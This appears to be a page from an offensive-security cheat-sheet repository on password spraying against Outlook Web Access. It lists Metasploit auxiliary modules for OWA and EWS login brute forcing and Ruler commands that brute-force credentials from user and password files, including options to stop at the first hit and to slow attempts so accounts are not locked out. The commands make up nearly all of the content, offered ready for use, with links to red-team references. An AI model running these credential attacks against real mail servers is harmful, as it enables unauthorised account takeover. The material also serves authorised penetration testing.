Skip to content

Latest commit

 

History

History
32 lines (21 loc) · 860 Bytes

outlook-web-access-owa.md

File metadata and controls

32 lines (21 loc) · 860 Bytes

Outlook Web Access (OWA)

Password Spraying OWA

Metasploit

# OWA brute force utility
use auxiliary/scanner/http/owa_login

# OWA Exchange Web Services (EWS) login scanner
use auxiliary/scanner/http/owa_ews_login

Ruler

# Brute force credentials
./ruler --domain $domain brute --users $userfile --passwords $passwordfile

# Stop after first valid credentials found
./ruler --domain $domain brute --users $userfile --passwords $passwordfile --stop

# Brute force credentials with a delay
./ruler --domain $domain brute --users $userfile --passwords $passwordfile --delay 2 --attempts 2

References

{% embed url="https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell" %}

{% embed url="https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying" %}